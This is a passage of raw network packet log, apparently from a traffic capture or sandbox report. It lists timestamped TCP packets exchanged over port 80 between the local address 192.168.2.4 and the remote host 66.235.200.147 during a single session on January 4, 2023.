Jan 4, 2023 16:47:38.728344917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728363991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728375912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728404999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728420973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728430033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728435040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728449106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728471041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728488922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728513956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728537083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728559971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728564024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728591919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728590965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728619099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728619099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728645086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728646994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728657961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728671074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728697062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728724003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728749037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728749037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728749037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728766918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728776932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728801966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728812933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728821993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728835106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728846073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728846073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728862047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728878975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728882074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728898048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728899002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728925943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728934050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728949070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728951931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728979111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728984118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729003906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729005098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729032040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729034901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729049921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729058027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729083061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729095936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729108095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729123116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729135036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729145050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729161024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729165077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729176044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729190111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729217052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729218960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729233027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729243994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729269981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729269981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729298115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729302883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729322910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729324102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729351044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729351997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729372978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729402065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729760885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729789972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729816914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729842901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729867935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729868889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729895115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729912043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729912043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729921103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729938984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729948997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729964018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.729974031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.729978085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730003119 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730037928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730067015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730092049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730118036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730127096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730139971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730154037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730178118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730180979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730206966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730211020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730221987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730233908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730263948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730268002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730276108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730277061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730295897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730314970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730328083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730340958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730359077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730367899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730391026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730418921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730731964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730757952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730783939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730809927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730835915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730861902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730863094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730863094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730863094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730863094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730889082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730890036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730902910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730917931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730946064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730947971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730973005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.730974913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730989933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.730999947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731019974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731026888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731049061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731055975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731079102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731086016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731112957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731129885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731138945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731147051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731164932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731169939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731189013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731192112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731219053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731219053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731234074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731246948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731272936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731280088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731301069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731308937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731332064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731348038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731683016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731709003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731734037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731749058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731760025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731767893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731785059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731786966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731813908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731813908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731827021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731838942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731864929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731867075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731878996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731890917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731916904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731916904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731941938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731945038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731959105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731969118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.731993914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.731995106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732012033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732022047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732048035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732064009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732073069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732088089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732099056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732111931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732125998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732131004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732151031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732151031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732176065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732178926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732189894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732207060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732223034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732234955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732260942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732300043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732659101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732686043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732712984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732728004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732739925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732760906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732918024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732944965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732969999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.732978106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732995033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.732995987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733012915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733022928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733042002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733048916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733068943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733076096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733098030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733103991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733124018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733131886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733150959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733159065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733175039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733185053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733201981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733212948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733238935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733243942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733266115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733270884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733293056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733299017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733313084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733319044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733340025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733346939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733366966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733374119 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733392954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733402014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733419895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733447075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733712912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733740091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733757019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733783960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733807087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733808994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733835936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.733838081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733860970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.733889103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748459101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748491049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748509884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748528957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748553038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748572111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748584986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748598099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748616934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748636961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748646975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748662949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748686075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748701096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748722076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748724937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748750925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748758078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748775959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748775959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748795986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748805046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748832941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748835087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748853922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748859882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748886108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748888969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748903036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748912096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748931885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748936892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748956919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748964071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.748982906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.748990059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749008894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749017954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749039888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749043941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749130964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749146938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749195099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749223948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749248028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749255896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749257088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749272108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749290943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749320030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749321938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749346972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749370098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749387026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749394894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749423981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749449968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749452114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749471903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749478102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749504089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749505043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749521017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749535084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749555111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749561071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749578953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749589920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749609947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749617100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749643087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749645948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749675989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749695063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749711990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749718904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749718904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749742031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749764919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749775887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749783039 CET	49696	80	192.168.2.4	66.235.200.147
